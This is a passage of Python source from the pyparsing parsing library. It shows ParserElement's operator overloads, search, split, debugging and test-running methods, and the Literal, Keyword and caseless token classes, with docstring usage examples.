out = [o for o in out if o]
return "".join(map(str, _flatten(out)))
except ParseBaseException as exc:
if ParserElement.verbose_stacktrace:
raise
else:
# catch and re-raise exception from here, clears out pyparsing internal stack trace
raise exc.with_traceback(None)
def search_string(
self,
instring: str,
max_matches: int = _MAX_INT,
*,
debug: bool = False,
maxMatches: int = _MAX_INT,
) -> ParseResults:
"""
Another extension to :class:`scan_string`, simplifying the access to the tokens found
to match the given parse expression. May be called with optional
``max_matches`` argument, to clip searching after 'n' matches are found.
Example::
# a capitalized word starts with an uppercase letter, followed by zero or more lowercase letters
cap_word = Word(alphas.upper(), alphas.lower())
print(cap_word.search_string("More than Iron, more than Lead, more than Gold I need Electricity"))
# the sum() builtin can be used to merge results into a single ParseResults object
print(sum(cap_word.search_string("More than Iron, more than Lead, more than Gold I need Electricity")))
prints::
[['More'], ['Iron'], ['Lead'], ['Gold'], ['I'], ['Electricity']]
['More', 'Iron', 'Lead', 'Gold', 'I', 'Electricity']
"""
maxMatches = min(maxMatches, max_matches)
try:
return ParseResults(
[t for t, s, e in self.scan_string(instring, maxMatches, debug=debug)]
)
except ParseBaseException as exc:
if ParserElement.verbose_stacktrace:
raise
else:
# catch and re-raise exception from here, clears out pyparsing internal stack trace
raise exc.with_traceback(None)
def split(
self,
instring: str,
maxsplit: int = _MAX_INT,
include_separators: bool = False,
*,
includeSeparators=False,
) -> Generator[str, None, None]:
"""
Generator method to split a string using the given expression as a separator.
May be called with optional ``maxsplit`` argument, to limit the number of splits;
and the optional ``include_separators`` argument (default= ``False``), if the separating
matching text should be included in the split results.
Example::
punc = one_of(list(".,;:/-!?"))
print(list(punc.split("This, this?, this sentence, is badly punctuated!")))
prints::
['This', ' this', '', ' this sentence', ' is badly punctuated', '']
"""
includeSeparators = includeSeparators or include_separators
last = 0
for t, s, e in self.scan_string(instring, max_matches=maxsplit):
yield instring[last:s]
if includeSeparators:
yield t[0]
last = e
yield instring[last:]
def __add__(self, other):
"""
Implementation of ``+`` operator - returns :class:`And`. Adding strings to a :class:`ParserElement`
converts them to :class:`Literal`s by default.
Example::
greet = Word(alphas) + "," + Word(alphas) + "!"
hello = "Hello, World!"
print(hello, "->", greet.parse_string(hello))
prints::
Hello, World! -> ['Hello', ',', 'World', '!']
``...`` may be used as a parse expression as a short form of :class:`SkipTo`.
Literal('start') + ... + Literal('end')
is equivalent to:
Literal('start') + SkipTo('end')("_skipped*") + Literal('end')
Note that the skipped text is returned with '_skipped' as a results name,
and to support having multiple skips in the same parser, the value returned is
a list of all skipped text.
"""
if other is Ellipsis:
return _PendingSkip(self)
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return And([self, other])
def __radd__(self, other):
"""
Implementation of ``+`` operator when left operand is not a :class:`ParserElement`
"""
if other is Ellipsis:
return SkipTo(self)("_skipped*") + self
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return other + self
def __sub__(self, other):
"""
Implementation of ``-`` operator, returns :class:`And` with error stop
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return self + And._ErrorStop() + other
def __rsub__(self, other):
"""
Implementation of ``-`` operator when left operand is not a :class:`ParserElement`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return other - self
def __mul__(self, other):
"""
Implementation of ``*`` operator, allows use of ``expr * 3`` in place of
``expr + expr + expr``. Expressions may also be multiplied by a 2-integer
tuple, similar to ``{min, max}`` multipliers in regular expressions. Tuples
may also include ``None`` as in:
- ``expr*(n, None)`` or ``expr*(n, )`` is equivalent
to ``expr*n + ZeroOrMore(expr)``
(read as "at least n instances of ``expr``")
- ``expr*(None, n)`` is equivalent to ``expr*(0, n)``
(read as "0 to n instances of ``expr``")
- ``expr*(None, None)`` is equivalent to ``ZeroOrMore(expr)``
- ``expr*(1, None)`` is equivalent to ``OneOrMore(expr)``
Note that ``expr*(None, n)`` does not raise an exception if
more than n exprs exist in the input stream; that is,
``expr*(None, n)`` does not enforce a maximum number of expr
occurrences. If this behavior is desired, then write
``expr*(None, n) + ~expr``
"""
if other is Ellipsis:
other = (0, None)
elif isinstance(other, tuple) and other[:1] == (Ellipsis,):
other = ((0,) + other[1:] + (None,))[:2]
if isinstance(other, int):
minElements, optElements = other, 0
elif isinstance(other, tuple):
other = tuple(o if o is not Ellipsis else None for o in other)
other = (other + (None, None))[:2]
if other[0] is None:
other = (0, other[1])
if isinstance(other[0], int) and other[1] is None:
if other[0] == 0:
return ZeroOrMore(self)
if other[0] == 1:
return OneOrMore(self)
else:
return self * other[0] + ZeroOrMore(self)
elif isinstance(other[0], int) and isinstance(other[1], int):
minElements, optElements = other
optElements -= minElements
else:
raise TypeError(
"cannot multiply ParserElement and ({}) objects".format(
",".join(type(item).__name__ for item in other)
)
)
else:
raise TypeError(
"cannot multiply ParserElement and {} objects".format(
type(other).__name__
)
)
if minElements < 0:
raise ValueError("cannot multiply ParserElement by negative value")
if optElements < 0:
raise ValueError(
"second tuple value must be greater or equal to first tuple value"
)
if minElements == optElements == 0:
return And([])
if optElements:
def makeOptionalList(n):
if n > 1:
return Opt(self + makeOptionalList(n - 1))
else:
return Opt(self)
if minElements:
if minElements == 1:
ret = self + makeOptionalList(optElements)
else:
ret = And([self] * minElements) + makeOptionalList(optElements)
else:
ret = makeOptionalList(optElements)
else:
if minElements == 1:
ret = self
else:
ret = And([self] * minElements)
return ret
def __rmul__(self, other):
return self.__mul__(other)
def __or__(self, other):
"""
Implementation of ``|`` operator - returns :class:`MatchFirst`
"""
if other is Ellipsis:
return _PendingSkip(self, must_skip=True)
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return MatchFirst([self, other])
def __ror__(self, other):
"""
Implementation of ``|`` operator when left operand is not a :class:`ParserElement`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return other | self
def __xor__(self, other):
"""
Implementation of ``^`` operator - returns :class:`Or`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return Or([self, other])
def __rxor__(self, other):
"""
Implementation of ``^`` operator when left operand is not a :class:`ParserElement`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return other ^ self
def __and__(self, other):
"""
Implementation of ``&`` operator - returns :class:`Each`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return Each([self, other])
def __rand__(self, other):
"""
Implementation of ``&`` operator when left operand is not a :class:`ParserElement`
"""
if isinstance(other, str_type):
other = self._literalStringClass(other)
if not isinstance(other, ParserElement):
raise TypeError(
"Cannot combine element of type {} with ParserElement".format(
type(other).__name__
)
)
return other & self
def __invert__(self):
"""
Implementation of ``~`` operator - returns :class:`NotAny`
"""
return NotAny(self)
# disable __iter__ to override legacy use of sequential access to __getitem__ to
# iterate over a sequence
__iter__ = None
def __getitem__(self, key):
"""
use ``[]`` indexing notation as a short form for expression repetition:
- ``expr[n]`` is equivalent to ``expr*n``
- ``expr[m, n]`` is equivalent to ``expr*(m, n)``
- ``expr[n, ...]`` or ``expr[n,]`` is equivalent
to ``expr*n + ZeroOrMore(expr)``
(read as "at least n instances of ``expr``")
- ``expr[..., n]`` is equivalent to ``expr*(0, n)``
(read as "0 to n instances of ``expr``")
- ``expr[...]`` and ``expr[0, ...]`` are equivalent to ``ZeroOrMore(expr)``
- ``expr[1, ...]`` is equivalent to ``OneOrMore(expr)``
``None`` may be used in place of ``...``.
Note that ``expr[..., n]`` and ``expr[m, n]``do not raise an exception
if more than ``n`` ``expr``s exist in the input stream. If this behavior is
desired, then write ``expr[..., n] + ~expr``.
"""
# convert single arg keys to tuples
try:
if isinstance(key, str_type):
key = (key,)
iter(key)
except TypeError:
key = (key, key)
if len(key) > 2:
raise TypeError(
"only 1 or 2 index arguments supported ({}{})".format(
key[:5], "... [{}]".format(len(key)) if len(key) > 5 else ""
)
)
# clip to 2 elements
ret = self * tuple(key[:2])
return ret
def __call__(self, name: str = None):
"""
Shortcut for :class:`set_results_name`, with ``list_all_matches=False``.
If ``name`` is given with a trailing ``'*'`` character, then ``list_all_matches`` will be
passed as ``True``.
If ``name` is omitted, same as calling :class:`copy`.
Example::
# these are equivalent
userdata = Word(alphas).set_results_name("name") + Word(nums + "-").set_results_name("socsecno")
userdata = Word(alphas)("name") + Word(nums + "-")("socsecno")
"""
if name is not None:
return self._setResultsName(name)
else:
return self.copy()
def suppress(self) -> "ParserElement":
"""
Suppresses the output of this :class:`ParserElement`; useful to keep punctuation from
cluttering up returned output.
"""
return Suppress(self)
def ignore_whitespace(self, recursive: bool = True) -> "ParserElement":
"""
Enables the skipping of whitespace before matching the characters in the
:class:`ParserElement`'s defined pattern.
:param recursive: If ``True`` (the default), also enable whitespace skipping in child elements (if any)
"""
self.skipWhitespace = True
return self
def leave_whitespace(self, recursive: bool = True) -> "ParserElement":
"""
Disables the skipping of whitespace before matching the characters in the
:class:`ParserElement`'s defined pattern. This is normally only used internally by
the pyparsing module, but may be needed in some whitespace-sensitive grammars.
:param recursive: If true (the default), also disable whitespace skipping in child elements (if any)
"""
self.skipWhitespace = False
return self
def set_whitespace_chars(
self, chars: Union[Set[str], str], copy_defaults: bool = False
) -> "ParserElement":
"""
Overrides the default whitespace chars
"""
self.skipWhitespace = True
self.whiteChars = set(chars)
self.copyDefaultWhiteChars = copy_defaults
return self
def parse_with_tabs(self) -> "ParserElement":
"""
Overrides default behavior to expand ``<TAB>`` s to spaces before parsing the input string.
Must be called before ``parse_string`` when the input grammar contains elements that
match ``<TAB>`` characters.
"""
self.keepTabs = True
return self
def ignore(self, other: "ParserElement") -> "ParserElement":
"""
Define expression to be ignored (e.g., comments) while doing pattern
matching; may be called repeatedly, to define multiple comment or other
ignorable patterns.
Example::
patt = OneOrMore(Word(alphas))
patt.parse_string('ablaj /* comment */ lskjd')
# -> ['ablaj']
patt.ignore(c_style_comment)
patt.parse_string('ablaj /* comment */ lskjd')
# -> ['ablaj', 'lskjd']
"""
import typing
if isinstance(other, str_type):
other = Suppress(other)
if isinstance(other, Suppress):
if other not in self.ignoreExprs:
self.ignoreExprs.append(other)
else:
self.ignoreExprs.append(Suppress(other.copy()))
return self
def set_debug_actions(
self,
start_action: DebugStartAction,
success_action: DebugSuccessAction,
exception_action: DebugExceptionAction,
) -> "ParserElement":
"""
Customize display of debugging messages while doing pattern matching:
- ``start_action`` - method to be called when an expression is about to be parsed;
should have the signature ``fn(input_string: str, location: int, expression: ParserElement, cache_hit: bool)``
- ``success_action`` - method to be called when an expression has successfully parsed;
should have the signature ``fn(input_string: str, start_location: int, end_location: int, expression: ParserELement, parsed_tokens: ParseResults, cache_hit: bool)``
- ``exception_action`` - method to be called when expression fails to parse;
should have the signature ``fn(input_string: str, location: int, expression: ParserElement, exception: Exception, cache_hit: bool)``
"""
self.debugActions = (
start_action or _default_start_debug_action,
success_action or _default_success_debug_action,
exception_action or _default_exception_debug_action,
)
self.debug = True
return self
def set_debug(self, flag=True) -> "ParserElement":
"""
Enable display of debugging messages while doing pattern matching.
Set ``flag`` to ``True`` to enable, ``False`` to disable.
Example::
wd = Word(alphas).set_name("alphaword")
integer = Word(nums).set_name("numword")
term = wd | integer
# turn on debugging for wd
wd.set_debug()
OneOrMore(term).parse_string("abc 123 xyz 890")
prints::
Match alphaword at loc 0(1,1)
Matched alphaword -> ['abc']
Match alphaword at loc 3(1,4)
Exception raised:Expected alphaword (at char 4), (line:1, col:5)
Match alphaword at loc 7(1,8)
Matched alphaword -> ['xyz']
Match alphaword at loc 11(1,12)
Exception raised:Expected alphaword (at char 12), (line:1, col:13)
Match alphaword at loc 15(1,16)
Exception raised:Expected alphaword (at char 15), (line:1, col:16)
The output shown is that produced by the default debug actions - custom debug actions can be
specified using :class:`set_debug_actions`. Prior to attempting
to match the ``wd`` expression, the debugging message ``"Match <exprname> at loc <n>(<line>,<col>)"``
is shown. Then if the parse succeeds, a ``"Matched"`` message is shown, or an ``"Exception raised"``
message is shown. Also note the use of :class:`set_name` to assign a human-readable name to the expression,
which makes debugging and exception messages easier to understand - for instance, the default
name created for the :class:`Word` expression without calling ``set_name`` is ``"W:(A-Za-z)"``.
"""
if flag:
self.set_debug_actions(
_default_start_debug_action,
_default_success_debug_action,
_default_exception_debug_action,
)
else:
self.debug = False
return self
@property
def default_name(self) -> str:
if self._defaultName is None:
self._defaultName = self._generateDefaultName()
return self._defaultName
@abstractmethod
def _generateDefaultName(self):
"""
Child classes must define this method, which defines how the ``default_name`` is set.
"""
def set_name(self, name: str) -> "ParserElement":
"""
Define name for this expression, makes debugging and exception messages clearer.
Example::
Word(nums).parse_string("ABC") # -> Exception: Expected W:(0-9) (at char 0), (line:1, col:1)
Word(nums).set_name("integer").parse_string("ABC") # -> Exception: Expected integer (at char 0), (line:1, col:1)
"""
self.customName = name
self.errmsg = "Expected " + self.name
if __diag__.enable_debug_on_named_expressions:
self.set_debug()
return self
@property
def name(self) -> str:
# This will use a user-defined name if available, but otherwise defaults back to the auto-generated name
return self.customName if self.customName is not None else self.default_name
def __str__(self) -> str:
return self.name
def __repr__(self) -> str:
return str(self)
def streamline(self) -> "ParserElement":
self.streamlined = True
self._defaultName = None
return self
def recurse(self):
return []
def _checkRecursion(self, parseElementList):
subRecCheckList = parseElementList[:] + [self]
for e in self.recurse():
e._checkRecursion(subRecCheckList)
def validate(self, validateTrace=None):
"""
Check defined expressions for valid structure, check for infinite recursive definitions.
"""
self._checkRecursion([])
def parse_file(
self,
file_or_filename: Union[str, Path, TextIO],
encoding: str = "utf-8",
parse_all: bool = False,
*,
parseAll: bool = False,
) -> ParseResults:
"""
Execute the parse expression on the given file or filename.
If a filename is specified (instead of a file object),
the entire file is opened, read, and closed before parsing.
"""
parseAll = parseAll or parse_all
try:
file_contents = file_or_filename.read()
except AttributeError:
with open(file_or_filename, "r", encoding=encoding) as f:
file_contents = f.read()
try:
return self.parse_string(file_contents, parseAll)
except ParseBaseException as exc:
if ParserElement.verbose_stacktrace:
raise
else:
# catch and re-raise exception from here, clears out pyparsing internal stack trace
raise exc.with_traceback(None)
def __eq__(self, other):
if self is other:
return True
elif isinstance(other, str_type):
return self.matches(other, parse_all=True)
elif isinstance(other, ParserElement):
return vars(self) == vars(other)
return False
def __hash__(self):
return id(self)
def matches(
self, test_string: str, parse_all: bool = True, *, parseAll: bool = True
) -> bool:
"""
Method for quick testing of a parser against a test string. Good for simple
inline microtests of sub expressions while building up larger parser.
Parameters:
- ``test_string`` - to test against this expression for a match
- ``parse_all`` - (default= ``True``) - flag to pass to :class:`parse_string` when running tests
Example::
expr = Word(nums)
assert expr.matches("100")
"""
parseAll = parseAll and parse_all
try:
self.parse_string(str(test_string), parse_all=parseAll)
return True
except ParseBaseException:
return False
def run_tests(
self,
tests: Union[str, List[str]],
parse_all: bool = True,
comment: OptionalType[Union["ParserElement", str]] = "#",
full_dump: bool = True,
print_results: bool = True,
failure_tests: bool = False,
post_parse: Callable[[str, ParseResults], str] = None,
file: OptionalType[TextIO] = None,
with_line_numbers: bool = False,
*,
parseAll: bool = True,
fullDump: bool = True,
printResults: bool = True,
failureTests: bool = False,
postParse: Callable[[str, ParseResults], str] = None,
):
"""
Execute the parse expression on a series of test strings, showing each
test, the parsed results or where the parse failed. Quick and easy way to
run a parse expression against a list of sample strings.
Parameters:
- ``tests`` - a list of separate test strings, or a multiline string of test strings
- ``parse_all`` - (default= ``True``) - flag to pass to :class:`parse_string` when running tests
- ``comment`` - (default= ``'#'``) - expression for indicating embedded comments in the test
string; pass None to disable comment filtering
- ``full_dump`` - (default= ``True``) - dump results as list followed by results names in nested outline;
if False, only dump nested list
- ``print_results`` - (default= ``True``) prints test output to stdout
- ``failure_tests`` - (default= ``False``) indicates if these tests are expected to fail parsing
- ``post_parse`` - (default= ``None``) optional callback for successful parse results; called as
`fn(test_string, parse_results)` and returns a string to be added to the test output
- ``file`` - (default= ``None``) optional file-like object to which test output will be written;
if None, will default to ``sys.stdout``
- ``with_line_numbers`` - default= ``False``) show test strings with line and column numbers
Returns: a (success, results) tuple, where success indicates that all tests succeeded
(or failed if ``failure_tests`` is True), and the results contain a list of lines of each
test's output
Example::
number_expr = pyparsing_common.number.copy()
result = number_expr.run_tests('''
# unsigned integer
100
# negative integer
-100
# float with scientific notation
6.02e23
# integer with scientific notation
1e-12
''')
print("Success" if result[0] else "Failed!")
result = number_expr.run_tests('''
# stray character
100Z
# missing leading digit before '.'
-.100
# too many '.'
3.14.159
''', failure_tests=True)
print("Success" if result[0] else "Failed!")
prints::
# unsigned integer
100
[100]
# negative integer
-100
[-100]
# float with scientific notation
6.02e23
[6.02e+23]
# integer with scientific notation
1e-12
[1e-12]
Success
# stray character
100Z
^
FAIL: Expected end of text (at char 3), (line:1, col:4)
# missing leading digit before '.'
-.100
^
FAIL: Expected {real number with scientific notation | real number | signed integer} (at char 0), (line:1, col:1)
# too many '.'
3.14.159
^
FAIL: Expected end of text (at char 4), (line:1, col:5)
Success
Each test string must be on a single line. If you want to test a string that spans multiple
lines, create a test like this::
expr.run_tests(r"this is a test\\n of strings that spans \\n 3 lines")
(Note that this is a raw string literal, you must include the leading ``'r'``.)
"""
from .testing import pyparsing_test
parseAll = parseAll and parse_all
fullDump = fullDump and full_dump
printResults = printResults and print_results
failureTests = failureTests or failure_tests
postParse = postParse or post_parse
if isinstance(tests, str_type):
tests = list(map(type(tests).strip, tests.rstrip().splitlines()))
if isinstance(comment, str_type):
comment = Literal(comment)
if file is None:
file = sys.stdout
print_ = file.write
result: Union[ParseResults, Exception]
allResults = []
comments = []
success = True
NL = Literal(r"\n").add_parse_action(replace_with("\n")).ignore(quoted_string)
BOM = "\ufeff"
for t in tests:
if comment is not None and comment.matches(t, False) or comments and not t:
comments.append(pyparsing_test.with_line_numbers(t))
continue
if not t:
continue
out = [
"\n" + "\n".join(comments) if comments else "",
pyparsing_test.with_line_numbers(t) if with_line_numbers else t,
]
comments = []
try:
# convert newline marks to actual newlines, and strip leading BOM if present
t = NL.transform_string(t.lstrip(BOM))
result = self.parse_string(t, parse_all=parseAll)
except ParseBaseException as pe:
fatal = "(FATAL)" if isinstance(pe, ParseFatalException) else ""
out.append(pe.explain())
out.append("FAIL: " + str(pe))
if ParserElement.verbose_stacktrace:
out.extend(traceback.format_tb(pe.__traceback__))
success = success and failureTests
result = pe
except Exception as exc:
out.append("FAIL-EXCEPTION: {}: {}".format(type(exc).__name__, exc))
if ParserElement.verbose_stacktrace:
out.extend(traceback.format_tb(exc.__traceback__))
success = success and failureTests
result = exc
else:
success = success and not failureTests
if postParse is not None:
try:
pp_value = postParse(t, result)
if pp_value is not None:
if isinstance(pp_value, ParseResults):
out.append(pp_value.dump())
else:
out.append(str(pp_value))
else:
out.append(result.dump())
except Exception as e:
out.append(result.dump(full=fullDump))
out.append(
"{} failed: {}: {}".format(
postParse.__name__, type(e).__name__, e
)
)
else:
out.append(result.dump(full=fullDump))
out.append("")
if printResults:
print_("\n".join(out))
allResults.append((t, result))
return success, allResults
def create_diagram(
self,
output_html: Union[TextIO, Path, str],
vertical: int = 3,
show_results_names: bool = False,
**kwargs,
) -> None:
"""
Create a railroad diagram for the parser.
Parameters:
- output_html (str or file-like object) - output target for generated
diagram HTML
- vertical (int) - threshold for formatting multiple alternatives vertically
instead of horizontally (default=3)
- show_results_names - bool flag whether diagram should show annotations for
defined results names
Additional diagram-formatting keyword arguments can also be included;
see railroad.Diagram class.
"""
try:
from .diagram import to_railroad, railroad_to_html
except ImportError as ie:
raise Exception(
"must ``pip install pyparsing[diagrams]`` to generate parser railroad diagrams"
) from ie
self.streamline()
railroad = to_railroad(
self,
vertical=vertical,
show_results_names=show_results_names,
diagram_kwargs=kwargs,
)
if isinstance(output_html, (str, Path)):
with open(output_html, "w", encoding="utf-8") as diag_file:
diag_file.write(railroad_to_html(railroad))
else:
# we were passed a file-like object, just write to it
output_html.write(railroad_to_html(railroad))
setDefaultWhitespaceChars = set_default_whitespace_chars
inlineLiteralsUsing = inline_literals_using
setResultsName = set_results_name
setBreak = set_break
setParseAction = set_parse_action
addParseAction = add_parse_action
addCondition = add_condition
setFailAction = set_fail_action
tryParse = try_parse
canParseNext = can_parse_next
resetCache = reset_cache
enableLeftRecursion = enable_left_recursion
enablePackrat = enable_packrat
parseString = parse_string
scanString = scan_string
searchString = search_string
transformString = transform_string
setWhitespaceChars = set_whitespace_chars
parseWithTabs = parse_with_tabs
setDebugActions = set_debug_actions
setDebug = set_debug
defaultName = default_name
setName = set_name
parseFile = parse_file
runTests = run_tests
ignoreWhitespace = ignore_whitespace
leaveWhitespace = leave_whitespace
class _PendingSkip(ParserElement):
# internal placeholder class to hold a place were '...' is added to a parser element,
# once another ParserElement is added, this placeholder will be replaced with a SkipTo
def __init__(self, expr: ParserElement, must_skip: bool = False):
super().__init__()
self.anchor = expr
self.must_skip = must_skip
def _generateDefaultName(self):
return str(self.anchor + Empty()).replace("Empty", "...")
def __add__(self, other):
skipper = SkipTo(other).set_name("...")("_skipped*")
if self.must_skip:
def must_skip(t):
if not t._skipped or t._skipped.as_list() == [""]:
del t[0]
t.pop("_skipped", None)
def show_skip(t):
if t._skipped.as_list()[-1:] == [""]:
t.pop("_skipped")
t["_skipped"] = "missing <" + repr(self.anchor) + ">"
return (
self.anchor + skipper().add_parse_action(must_skip)
| skipper().add_parse_action(show_skip)
) + other
return self.anchor + skipper + other
def __repr__(self):
return self.defaultName
def parseImpl(self, *args):
raise Exception(
"use of `...` expression without following SkipTo target expression"
)
class Token(ParserElement):
"""Abstract :class:`ParserElement` subclass, for defining atomic
matching patterns.
"""
def __init__(self):
super().__init__(savelist=False)
def _generateDefaultName(self):
return type(self).__name__
class Empty(Token):
"""
An empty token, will always match.
"""
def __init__(self):
super().__init__()
self.mayReturnEmpty = True
self.mayIndexError = False
class NoMatch(Token):
"""
A token that will never match.
"""
def __init__(self):
super().__init__()
self.mayReturnEmpty = True
self.mayIndexError = False
self.errmsg = "Unmatchable token"
def parseImpl(self, instring, loc, doActions=True):
raise ParseException(instring, loc, self.errmsg, self)
class Literal(Token):
"""
Token to exactly match a specified string.
Example::
Literal('blah').parse_string('blah') # -> ['blah']
Literal('blah').parse_string('blahfooblah') # -> ['blah']
Literal('blah').parse_string('bla') # -> Exception: Expected "blah"
For case-insensitive matching, use :class:`CaselessLiteral`.
For keyword matching (force word break before and after the matched string),
use :class:`Keyword` or :class:`CaselessKeyword`.
"""
def __init__(self, match_string: str = "", *, matchString: str = ""):
super().__init__()
match_string = matchString or match_string
self.match = match_string
self.matchLen = len(match_string)
try:
self.firstMatchChar = match_string[0]
except IndexError:
raise ValueError("null string passed to Literal; use Empty() instead")
self.errmsg = "Expected " + self.name
self.mayReturnEmpty = False
self.mayIndexError = False
# Performance tuning: modify __class__ to select
# a parseImpl optimized for single-character check
if self.matchLen == 1 and type(self) is Literal:
self.__class__ = _SingleCharLiteral
def _generateDefaultName(self):
return repr(self.match)
def parseImpl(self, instring, loc, doActions=True):
if instring[loc] == self.firstMatchChar and instring.startswith(
self.match, loc
):
return loc + self.matchLen, self.match
raise ParseException(instring, loc, self.errmsg, self)
class _SingleCharLiteral(Literal):
def parseImpl(self, instring, loc, doActions=True):
if instring[loc] == self.firstMatchChar:
return loc + 1, self.match
raise ParseException(instring, loc, self.errmsg, self)
ParserElement._literalStringClass = Literal
class Keyword(Token):
"""
Token to exactly match a specified string as a keyword, that is,
it must be immediately followed by a non-keyword character. Compare
with :class:`Literal`:
- ``Literal("if")`` will match the leading ``'if'`` in
``'ifAndOnlyIf'``.
- ``Keyword("if")`` will not; it will only match the leading
``'if'`` in ``'if x=1'``, or ``'if(y==2)'``
Accepts two optional constructor arguments in addition to the
keyword string:
- ``identChars`` is a string of characters that would be valid
identifier characters, defaulting to all alphanumerics + "_" and
"$"
- ``caseless`` allows case-insensitive matching, default is ``False``.
Example::
Keyword("start").parse_string("start") # -> ['start']
Keyword("start").parse_string("starting") # -> Exception
For case-insensitive matching, use :class:`CaselessKeyword`.
"""
DEFAULT_KEYWORD_CHARS = alphanums + "_$"
def __init__(
self,
match_string: str = "",
ident_chars: OptionalType[str] = None,
caseless: bool = False,
*,
matchString: str = "",
identChars: OptionalType[str] = None,
):
super().__init__()
identChars = identChars or ident_chars
if identChars is None:
identChars = Keyword.DEFAULT_KEYWORD_CHARS
match_string = matchString or match_string
self.match = match_string
self.matchLen = len(match_string)
try:
self.firstMatchChar = match_string[0]
except IndexError:
raise ValueError("null string passed to Keyword; use Empty() instead")
self.errmsg = "Expected {} {}".format(type(self).__name__, self.name)
self.mayReturnEmpty = False
self.mayIndexError = False
self.caseless = caseless
if caseless:
self.caselessmatch = match_string.upper()
identChars = identChars.upper()
self.identChars = set(identChars)
def _generateDefaultName(self):
return repr(self.match)
def parseImpl(self, instring, loc, doActions=True):
errmsg = self.errmsg
errloc = loc
if self.caseless:
if instring[loc : loc + self.matchLen].upper() == self.caselessmatch:
if loc == 0 or instring[loc - 1].upper() not in self.identChars:
if (
loc >= len(instring) - self.matchLen
or instring[loc + self.matchLen].upper() not in self.identChars
):
return loc + self.matchLen, self.match
else:
# followed by keyword char
errmsg += ", was immediately followed by keyword character"
errloc = loc + self.matchLen
else:
# preceded by keyword char
errmsg += ", keyword was immediately preceded by keyword character"
errloc = loc - 1
# else no match just raise plain exception
else:
if (
instring[loc] == self.firstMatchChar
and self.matchLen == 1
or instring.startswith(self.match, loc)
):
if loc == 0 or instring[loc - 1] not in self.identChars:
if (
loc >= len(instring) - self.matchLen
or instring[loc + self.matchLen] not in self.identChars
):
return loc + self.matchLen, self.match
else:
# followed by keyword char
errmsg += (
", keyword was immediately followed by keyword character"
)
errloc = loc + self.matchLen
else:
# preceded by keyword char
errmsg += ", keyword was immediately preceded by keyword character"
errloc = loc - 1
# else no match just raise plain exception
raise ParseException(instring, errloc, errmsg, self)
@staticmethod
def set_default_keyword_chars(chars):
"""
Overrides the default characters used by :class:`Keyword` expressions.
"""
Keyword.DEFAULT_KEYWORD_CHARS = chars
setDefaultKeywordChars = set_default_keyword_chars
class CaselessLiteral(Literal):
"""
Token to match a specified string, ignoring case of letters.
Note: the matched results will always be in the case of the given
match string, NOT the case of the input text.
Example::
OneOrMore(CaselessLiteral("CMD")).parse_string("cmd CMD Cmd10")
# -> ['CMD', 'CMD', 'CMD']
(Contrast with example for :class:`CaselessKeyword`.)
"""
def __init__(self, match_string: str = "", *, matchString: str = ""):
match_string = matchString or match_string
super().__init__(match_string.upper())
# Preserve the defining literal.
self.returnString = match_string
self.errmsg = "Expected " + self.name
def parseImpl(self, instring, loc, doActions=True):
if instring[loc : loc + self.matchLen].upper() == self.match:
return loc + self.matchLen, self.returnString
raise ParseException(instring, loc, self.errmsg, self)
class CaselessKeyword(Keyword):
"""
Caseless version of :class:`Keyword`.
Example::
OneOrMore(CaselessKeyword("CMD")).parse_string("cmd CMD Cmd10")
# -> ['CMD', 'CMD']
(Contrast with example for :class:`CaselessLiteral`.)
"""
def __init__(
self,
match_string: str = "",
ident_chars: OptionalType[str] = None,
*,
matchString: str = "",
identChars: OptionalType[str] = None,
):
identChars = identChars or ident_chars
match_string = matchString or match_string
super().__init__(match_string, identChars, caseless=True)
class CloseMatch(Token):
"""A variation on :class:`Literal` which matches "close" matches,
that is, strings with at most 'n' mismatching characters.
:class:`CloseMatch` takes parameters:
- ``match_string`` - string to be matched
- ``caseless`` - a boolean indicating whether to ignore casing when comparing characters
- ``max_mismatches`` - (``default=1``) maximum number of
mismatches allowed to count as a match
The results from a successful parse will contain the matched text
from the input string and the following named results:
- ``mismatches`` - a list of the positions within the
match_string where mismatches were found
- ``original`` - the original match_string used to compare
against the input string
If ``mismatches`` is an empty list, then the match was an exact
match.
Example::
patt = CloseMatch("ATCATCGAATGGA")
patt.parse_string("ATCATCGAAXGGA") # -> (['ATCATCGAAXGGA'], {'mismatches': [[9]], 'original': ['ATCATCGAATGGA']})
patt.parse_string("ATCAXCGAAXGGA") # -> Exception: Expected 'ATCATCGAATGGA' (with up to 1 mismatches) (at char 0), (line:1, col:1)
# exact match
patt.parse_string("ATCATCGAATGGA") # -> (['ATCATCGAATGGA'], {'mismatches': [[]], 'original': ['ATCATCGAATGGA']})
# close match allowing up to 2 mismatches
patt = CloseMatch("ATCATCGAATGGA", max_mismatches=2)
patt.parse_string("ATCAXCGAAXGGA") # -> (['ATCAXCGAAXGGA'], {'mismatches': [[4, 9]], 'original': ['ATCATCGAATGGA']})
"""
def __init__(
self,
match_string: str,
max_mismatches: int = None,
*,
maxMismatches: int = 1,
caseless=False,
):
maxMismatches = max_mismatches if max_mismatches is not None else maxMismatches
super().__init__()
self.match_string = match_string
self.maxMismatches = maxMismatches
self.errmsg = "Expected {!r} (with up to {} mismatches)".format(
self.match_string, self.maxMismatches
)
self.caseless = caseless
self.mayIndexError = False
